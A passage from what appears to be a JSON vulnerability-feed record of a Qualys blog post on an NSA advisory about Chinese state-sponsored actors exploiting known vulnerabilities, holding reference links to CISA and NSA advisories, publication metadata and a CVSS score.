References\n\n<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>\n\n<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n\n<https://us-cert.cisa.gov/ncas/current-activity/2020/10/20/nsa-releases-advisory-chinese-state-sponsored-actors-exploiting>", "modified": "2020-10-22T23:10:29", "published": "2020-10-22T23:10:29", "id": "QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "href": "https://blog.qualys.com/category/vulnerabilities-research", "type": "qualysblog", "title": "NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
